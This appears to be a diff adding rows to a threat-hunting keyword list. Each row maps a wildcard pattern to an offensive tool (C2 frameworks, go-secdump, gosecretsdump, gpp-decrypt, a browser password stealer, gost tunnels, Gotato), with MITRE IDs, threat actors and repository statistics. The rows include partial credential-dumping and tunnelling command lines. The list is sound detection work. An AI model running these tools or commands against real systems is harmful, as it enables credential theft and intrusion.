+"*go-external-c2*","offensive_tool_keyword","DoHC2","DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/SpiderLabs/DoHC2","1","1","N/A","10","10","432","99","2020-08-07T12:48:13Z","2018-10-23T19:40:23Z"
+"*GoFetchAD/GoFetch*","offensive_tool_keyword","GoFetch","GoFetch is a tool to automatically exercise an attack plan generated by the BloodHound application.","T1078 - T1078.003 - T1021 - T1021.006 - T1076.001","TA0005 - TA0001 - TA0003","N/A","N/A","Exploitation tools - AD Enumeration","https://github.com/GoFetchAD/GoFetch","1","1","N/A","10","7","615","126","2017-06-20T14:15:10Z","2017-04-11T10:45:23Z"
+"*GoFetch-master*","offensive_tool_keyword","GoFetch","GoFetch is a tool to automatically exercise an attack plan generated by the BloodHound application.","T1078 - T1078.003 - T1021 - T1021.006 - T1076.001","TA0005 - TA0001 - TA0003","N/A","N/A","Exploitation tools - AD Enumeration","https://github.com/GoFetchAD/GoFetch","1","1","N/A","10","7","615","126","2017-06-20T14:15:10Z","2017-04-11T10:45:23Z"
+"*gohaleygoandhackawaythegibson*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z"
+"*golang_c2-master*","offensive_tool_keyword","golang_c2","C2 written in Go for red teams aka gorfice2k","T1071 - T1021 - T1043 - T1090","TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/m00zh33/golang_c2","1","1","N/A","10","10","4","8","2019-03-18T00:46:41Z","2019-03-19T02:39:59Z"
+"*golden_ticket.py*","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1021 - T1021.002 - T1022 - T1032 - T1043 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Apollo/","1","1","N/A","10","10","401","83","2023-08-17T14:46:04Z","2020-11-09T08:05:16Z"
+"*golden_ticket.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
+"*goldencopy * --password * --stealth --krbtgt 060ee2d06c5648e60a9ed916c9221ad19d90e5fb7b1cccf9d51f540fe991ada1 *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z"
+"*GoldenGMSA.exe*","offensive_tool_keyword","GoldenGMSA","GolenGMSA tool for working with GMSA passwords","T1003.004 - T1078.003 - T1059.006","TA0006 - TA0004 - TA0002","N/A","N/A","Credential Access","https://github.com/Semperis/GoldenGMSA","1","1","N/A","7","2","113","17","2023-07-03T09:35:48Z","2022-02-03T10:32:05Z"
+"*GoldenGMSA-main*","offensive_tool_keyword","GoldenGMSA","GolenGMSA tool for working with GMSA passwords","T1003.004 - T1078.003 - T1059.006","TA0006 - TA0004 - TA0002","N/A","N/A","Credential Access","https://github.com/Semperis/GoldenGMSA","1","1","N/A","7","2","113","17","2023-07-03T09:35:48Z","2022-02-03T10:32:05Z"
+"*goldenPac.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/SecureAuthCorp/impacket","1","0","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z"
+"*goMatrixC2.go*","offensive_tool_keyword","goMatrixC2","C2 leveraging Matrix/Element Messaging Platform as Backend to control Implants in goLang.","T1090 - T1027 - T1071","TA0011 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/n1k7l4i/goMatrixC2","1","1","N/A","10","10","0","2","2023-09-11T10:20:41Z","2023-08-31T09:36:38Z"
+"*goMatrixC2-main*","offensive_tool_keyword","goMatrixC2","C2 leveraging Matrix/Element Messaging Platform as Backend to control Implants in goLang.","T1090 - T1027 - T1071","TA0011 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/n1k7l4i/goMatrixC2","1","1","N/A","10","10","0","2","2023-09-11T10:20:41Z","2023-08-31T09:36:38Z"
+"*GooDork*","offensive_tool_keyword","GooDork","GooDork is a simple python script designed to allow you to leverage the power of google dorking straight from the comfort of your command line. GooDork offers powerfull use of googles search directives. by analyzing results from searches using regular expressions that you supply","T1136 - T1560 - T1213","TA0011 - TA0007","N/A","N/A","Information Gathering","https://github.com/k3170makan/GooDork","1","0","N/A","N/A","2","123","39","2013-06-08T23:13:12Z","2012-03-16T22:40:40Z"
+"*GoodSync Server*","greyware_tool_keyword","Goodsync","GoodSync is a backup and file synchronization program abused by attacker for data exfiltration","T1567.002 - T1020 - T1039","TA0010 ","N/A","N/A","Data Exfiltration","https://www.goodsync.com/","1","0","Service Name","9","10","N/A","N/A","N/A","N/A"
+"*GoodSync-vsub-2Go-Setup.exe*","greyware_tool_keyword","Goodsync","GoodSync is a backup and file synchronization program abused by attacker for data exfiltration","T1567.002 - T1020 - T1039","TA0010 ","N/A","N/A","Data Exfiltration","https://www.goodsync.com/","1","1","portable version","9","10","N/A","N/A","N/A","N/A"
+"*google-chrome/cookies.txt*","offensive_tool_keyword","Browser-password-stealer","This python program gets all the saved passwords + credit cards and bookmarks from chromium based browsers supports chromium 80 and above!","T1003.002 - T1056.001","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/henry-richard7/Browser-password-stealer","1","0","N/A","10","4","304","51","2023-09-03T10:32:39Z","2020-09-15T09:23:56Z"
+"*google-chrome/credit_cards.txt*","offensive_tool_keyword","Browser-password-stealer","This python program gets all the saved passwords + credit cards and bookmarks from chromium based browsers supports chromium 80 and above!","T1003.002 - T1056.001","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/henry-richard7/Browser-password-stealer","1","0","N/A","10","4","304","51","2023-09-03T10:32:39Z","2020-09-15T09:23:56Z"
+"*google-chrome/history.txt*","offensive_tool_keyword","Browser-password-stealer","This python program gets all the saved passwords + credit cards and bookmarks from chromium based browsers supports chromium 80 and above!","T1003.002 - T1056.001","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/henry-richard7/Browser-password-stealer","1","0","N/A","10","4","304","51","2023-09-03T10:32:39Z","2020-09-15T09:23:56Z"
+"*google-chrome/login_data.txt*","offensive_tool_keyword","Browser-password-stealer","This python program gets all the saved passwords + credit cards and bookmarks from chromium based browsers supports chromium 80 and above!","T1003.002 - T1056.001","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/henry-richard7/Browser-password-stealer","1","0","N/A","10","4","304","51","2023-09-03T10:32:39Z","2020-09-15T09:23:56Z"
+"*google-chrome\cookies.txt*","offensive_tool_keyword","Browser-password-stealer","This python program gets all the saved passwords + credit cards and bookmarks from chromium based browsers supports chromium 80 and above!","T1003.002 - T1056.001","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/henry-richard7/Browser-password-stealer","1","0","N/A","10","4","304","51","2023-09-03T10:32:39Z","2020-09-15T09:23:56Z"
+"*google-chrome\credit_cards.txt*","offensive_tool_keyword","Browser-password-stealer","This python program gets all the saved passwords + credit cards and bookmarks from chromium based browsers supports chromium 80 and above!","T1003.002 - T1056.001","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/henry-richard7/Browser-password-stealer","1","0","N/A","10","4","304","51","2023-09-03T10:32:39Z","2020-09-15T09:23:56Z"
+"*google-chrome\history.txt*","offensive_tool_keyword","Browser-password-stealer","This python program gets all the saved passwords + credit cards and bookmarks from chromium based browsers supports chromium 80 and above!","T1003.002 - T1056.001","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/henry-richard7/Browser-password-stealer","1","0","N/A","10","4","304","51","2023-09-03T10:32:39Z","2020-09-15T09:23:56Z"
+"*google-chrome\login_data.txt*","offensive_tool_keyword","Browser-password-stealer","This python program gets all the saved passwords + credit cards and bookmarks from chromium based browsers supports chromium 80 and above!","T1003.002 - T1056.001","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/henry-richard7/Browser-password-stealer","1","0","N/A","10","4","304","51","2023-09-03T10:32:39Z","2020-09-15T09:23:56Z"
+"*google-get-pdf-metadata *","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","7","1","75","8","2023-09-27T06:46:46Z","2021-11-15T13:40:56Z"
+"*google-get-rootdomains *","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","7","1","75","8","2023-09-27T06:46:46Z","2021-11-15T13:40:56Z"
+"*goPassGen-master*","offensive_tool_keyword","goPassGen","Easily-guessable Password Generator for Password Spray Attack","T1110 - T1110.003","TA0006 ","N/A","N/A","Exploitation tools","https://github.com/bigb0sss/goPassGen","1","1","N/A","8","1","20","3","2020-06-04T23:13:44Z","2020-06-04T22:33:37Z"
+"*gopherus --exploit mysql*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z"
+"*gophish*phish.go*","offensive_tool_keyword","gophish","Gophish is an open-source phishing toolkit designed for businesses and penetration testers. It provides the ability to quickly and easily setup and execute phishing engagements and security awareness training.","T1566 - T1598","TA0008 - TA0009","N/A","N/A","Exploitation tools","https://github.com/gophish/gophish","1","1","N/A","N/A","10","9759","1877","2023-09-28T02:03:58Z","2013-11-18T23:26:43Z"
+"*gophish.go*","offensive_tool_keyword","gophish","Open-Source Phishing Toolkit","T1566-001 - T1566-002 - T1566-003 - T1056-001 - T1113 - T1567-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/gophish/gophish","1","1","N/A","10","10","9759","1877","2023-09-28T02:03:58Z","2013-11-18T23:26:43Z"
+"*gophish/gophish*","offensive_tool_keyword","gophish","Gophish is an open-source phishing toolkit designed for businesses and penetration testers. It provides the ability to quickly and easily setup and execute phishing engagements and security awareness training.","T1566 - T1598","TA0008 - TA0009","N/A","N/A","Exploitation tools","https://github.com/gophish/gophish","1","1","N/A","N/A","10","9759","1877","2023-09-28T02:03:58Z","2013-11-18T23:26:43Z"
+"*gophish-send-mail.py*","offensive_tool_keyword","phishing-HTML-linter","Phishing and Social-Engineering related scripts","T1566.001 - T1056.001","TA0040 - TA0001","N/A","N/A","Phishing","https://github.com/mgeeky/Penetration-Testing-Tools/blob/master/phishing","1","1","N/A","10","10","2282","458","2023-06-27T19:16:49Z","2018-02-02T21:24:03Z"
+"*GoRelayServer.dll*","offensive_tool_keyword","DavRelayUp","DavRelayUp - a universal no-fix local privilege escalation in domain-joined windows workstations where LDAP signing is not enforced","T1078 - T1078.004 - T1068","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/ShorSec/DavRelayUp","1","1","N/A","9","5","448","70","2023-06-05T09:17:06Z","2023-06-05T07:49:39Z"
+"*gorsair -t *","offensive_tool_keyword","Gorsair","Gorsair hacks its way into remote docker containers that expose their APIs","T1552","TA0006","N/A","N/A","Exploitation tools","https://github.com/Ullaakut/Gorsair","1","0","N/A","N/A","9","825","74","2023-09-09T13:18:33Z","2018-08-02T16:49:14Z"
+"*go-secdump -*","offensive_tool_keyword","go-secdump","Tool to remotely dump secrets from the Windows registry","T1003.002 - T1012 - T1059.003","TA0006 - TA0003 - TA0002","N/A","N/A","Credential Access","https://github.com/jfjallid/go-secdump","1","0","N/A","10","1","82","7","2023-05-02T15:01:10Z","2023-02-23T17:02:50Z"
+"*go-secdump.exe*","offensive_tool_keyword","go-secdump","Tool to remotely dump secrets from the Windows registry","T1003.002 - T1012 - T1059.003","TA0006 - TA0003 - TA0002","N/A","N/A","Credential Access","https://github.com/jfjallid/go-secdump","1","1","N/A","10","1","82","7","2023-05-02T15:01:10Z","2023-02-23T17:02:50Z"
+"*go-secdump-main*","offensive_tool_keyword","go-secdump","Tool to remotely dump secrets from the Windows registry","T1003.002 - T1012 - T1059.003","TA0006 - TA0003 - TA0002","N/A","N/A","Credential Access","https://github.com/jfjallid/go-secdump","1","1","N/A","10","1","82","7","2023-05-02T15:01:10Z","2023-02-23T17:02:50Z"
+"*gosecretsdump -ntds *-system *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z"
+"*gosecure/pyrdp*","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","1","can also be used by blueteam as a honeypot","10","10","1296","235","2023-07-28T14:33:09Z","2018-09-07T19:17:41Z"
+"*go-shellcode.py*","offensive_tool_keyword","cobaltstrike","bypassAV cobaltstrike shellcode","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/jas502n/bypassAV-1","1","1","N/A","10","10","18","9","2021-03-04T01:51:14Z","2021-03-03T11:33:38Z"
+"*goShellCodeByPassVT*","offensive_tool_keyword","cobaltstrike","generate shellcode","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/fcre1938/goShellCodeByPassVT","1","1","N/A","10","10","N/A","N/A","N/A","N/A"
+"*goshs -b * --ssl --self-signed -p * -d /workspace*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z"
+"*gost -L=:* -F=*:*","offensive_tool_keyword","gost","Ransomware operators actively use Gost capabilities () in order to communicate with their remote server. using the command below. To hide the software in plain sight. they rename it to `System.exe` or `update.exe`.","T1568 - T1001 - T1027 - T1041","TA0002 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/ginuerzh/gost","1","0","N/A","N/A","10","13872","2298","2023-09-21T04:01:17Z","2015-03-20T09:45:08Z"
+"*gost -L=admin:*@localhost:*","offensive_tool_keyword","gost","Ransomware operators actively use Gost capabilities () in order to communicate with their remote server. using the command below. To hide the software in plain sight. they rename it to `System.exe` or `update.exe`.","T1568 - T1001 - T1027 - T1041","TA0002 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/ginuerzh/gost","1","0","N/A","N/A","10","13872","2298","2023-09-21T04:01:17Z","2015-03-20T09:45:08Z"
+"*gost -L=forward+ssh://:*","offensive_tool_keyword","gost","Ransomware operators actively use Gost capabilities () in order to communicate with their remote server. using the command below. To hide the software in plain sight. they rename it to `System.exe` or `update.exe`.","T1568 - T1001 - T1027 - T1041","TA0002 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/ginuerzh/gost","1","0","N/A","N/A","10","13872","2298","2023-09-21T04:01:17Z","2015-03-20T09:45:08Z"
+"*gost -L=rtcp://*","offensive_tool_keyword","gost","Ransomware operators actively use Gost capabilities () in order to communicate with their remote server. using the command below. To hide the software in plain sight. they rename it to `System.exe` or `update.exe`.","T1568 - T1001 - T1027 - T1041","TA0002 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/ginuerzh/gost","1","0","N/A","N/A","10","13872","2298","2023-09-21T04:01:17Z","2015-03-20T09:45:08Z"
+"*gost -L=rudp://*","offensive_tool_keyword","gost","Ransomware operators actively use Gost capabilities () in order to communicate with their remote server. using the command below. To hide the software in plain sight. they rename it to `System.exe` or `update.exe`.","T1568 - T1001 - T1027 - T1041","TA0002 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/ginuerzh/gost","1","0","N/A","N/A","10","13872","2298","2023-09-21T04:01:17Z","2015-03-20T09:45:08Z"
+"*gost -L=ssh://:","offensive_tool_keyword","gost","Ransomware operators actively use Gost capabilities () in order to communicate with their remote server. using the command below. To hide the software in plain sight. they rename it to `System.exe` or `update.exe`.","T1568 - T1001 - T1027 - T1041","TA0002 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/ginuerzh/gost","1","0","N/A","N/A","10","13872","2298","2023-09-21T04:01:17Z","2015-03-20T09:45:08Z"
+"*gost -L=ssu://*","offensive_tool_keyword","gost","Ransomware operators actively use Gost capabilities () in order to communicate with their remote server. using the command below. To hide the software in plain sight. they rename it to `System.exe` or `update.exe`.","T1568 - T1001 - T1027 - T1041","TA0002 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/ginuerzh/gost","1","0","N/A","N/A","10","13872","2298","2023-09-21T04:01:17Z","2015-03-20T09:45:08Z"
+"*gost -L=udp://*","offensive_tool_keyword","gost","Ransomware operators actively use Gost capabilities () in order to communicate with their remote server. using the command below. To hide the software in plain sight. they rename it to `System.exe` or `update.exe`.","T1568 - T1001 - T1027 - T1041","TA0002 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/ginuerzh/gost","1","0","N/A","N/A","10","13872","2298","2023-09-21T04:01:17Z","2015-03-20T09:45:08Z"
+"*gotato -m http*","offensive_tool_keyword","Gotato","Generic impersonation and privilege escalation with Golang. Like GenericPotato both named pipes and HTTP are supported.","T1003.003 - T1056.002 - T1550.001 - T1090","TA0005 - TA0004 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/iammaguire/Gotato","1","0","N/A","9","2","114","16","2021-06-07T21:19:58Z","2021-06-05T22:32:48Z"
+"*gotato -m pipe*","offensive_tool_keyword","Gotato","Generic impersonation and privilege escalation with Golang. Like GenericPotato both named pipes and HTTP are supported.","T1003.003 - T1056.002 - T1550.001 - T1090","TA0005 - TA0004 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/iammaguire/Gotato","1","0","N/A","9","2","114","16","2021-06-07T21:19:58Z","2021-06-05T22:32:48Z"
+"*gotato* -n mal*","offensive_tool_keyword","Gotato","Generic impersonation and privilege escalation with Golang. Like GenericPotato both named pipes and HTTP are supported.","T1003.003 - T1056.002 - T1550.001 - T1090","TA0005 - TA0004 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/iammaguire/Gotato","1","0","N/A","9","2","114","16","2021-06-07T21:19:58Z","2021-06-05T22:32:48Z"
+"*gotato* -p 4644*","offensive_tool_keyword","Gotato","Generic impersonation and privilege escalation with Golang. Like GenericPotato both named pipes and HTTP are supported.","T1003.003 - T1056.002 - T1550.001 - T1090","TA0005 - TA0004 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/iammaguire/Gotato","1","0","N/A","9","2","114","16","2021-06-07T21:19:58Z","2021-06-05T22:32:48Z"
+"*Gotato-main.*","offensive_tool_keyword","Gotato","Generic impersonation and privilege escalation with Golang. Like GenericPotato both named pipes and HTTP are supported.","T1003.003 - T1056.002 - T1550.001 - T1090","TA0005 - TA0004 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/iammaguire/Gotato","1","1","N/A","9","2","114","16","2021-06-07T21:19:58Z","2021-06-05T22:32:48Z"
+"*govolution/avet*","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","1","N/A","10","10","1523","344","2023-03-24T16:50:08Z","2017-01-28T14:56:47Z"
+"*goZulipC2.go*","offensive_tool_keyword","goZulipC2","C2 leveraging Zulip Messaging Platform as Backend.","T1090 - T1090.003 - T1071 - T1071.001","TA0011 - TA0009","N/A","N/A","C2","https://github.com/n1k7l4i/goZulipC2","1","1","N/A","10","10","5","2","2023-08-31T12:06:58Z","2023-08-13T11:04:20Z"
+"*goZulipC2-main*","offensive_tool_keyword","goZulipC2","C2 leveraging Zulip Messaging Platform as Backend.","T1090 - T1090.003 - T1071 - T1071.001","TA0011 - TA0009","N/A","N/A","C2","https://github.com/n1k7l4i/goZulipC2","1","1","N/A","10","10","5","2","2023-08-31T12:06:58Z","2023-08-13T11:04:20Z"
+"*gpg --list-keys*","greyware_tool_keyword","gpg","List gpg keys for privilege escalation","T1553.002","TA0006","N/A","N/A","Discovery - Privilege Escalation","N/A","1","0","N/A","4","8","N/A","N/A","N/A","N/A"
+"*gpg_keys/xmrig.asc*","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","0","N/A","9","10","7770","3472","2023-09-29T12:15:29Z","2017-04-15T05:57:53Z"
+"*gpg2john.*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z"
+"*gpoddity.py*","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1076 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","1","N/A","9","1","91","6","2023-10-04T21:15:32Z","2023-09-01T08:13:25Z"
+"*gpoddity_smbserver.py*","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1076 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","1","N/A","9","1","91","6","2023-10-04T21:15:32Z","2023-09-01T08:13:25Z" +"*GPOddity-master*","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1076 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","1","N/A","9","1","91","6","2023-10-04T21:15:32Z","2023-09-01T08:13:25Z" +"*GPO-RemoteAccess.txt*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*gpp_autologin.py*","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*gpp_password.py*","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*GPP_Passwords.txt*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation 
Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*gppassword.py*","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","1","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" +"*gpp-decrypt *","offensive_tool_keyword","gpp-decrypt","Decrypt the given Group Policy Preferences","T1552.002 - T1212","TA0009 - TA0006","N/A","N/A","Credential Access","https://gitlab.com/kalilinux/packages/gpp-decrypt","1","0","N/A","6","10","N/A","N/A","N/A","N/A" +"*gpp-decrypt.py -f groups.xml*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*gpp-decrypt.rb*","offensive_tool_keyword","gpp-decrypt","Decrypt the given Group Policy Preferences","T1552.002 - T1212","TA0009 - TA0006","N/A","N/A","Credential Access","https://gitlab.com/kalilinux/packages/gpp-decrypt","1","1","N/A","6","10","N/A","N/A","N/A","N/A" +"*GPSCoordinates.exe*","offensive_tool_keyword","GPSCoordinates","Tracks the system's GPS coordinates (accurate within 1km currently) if Location Services are enabled","T1018 - T1059.001","TA0001 - TA0002","N/A","N/A","Reconnaissance","https://github.com/matterpreter/OffensiveCSharp/tree/master/GPSCoordinates","1","1","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" 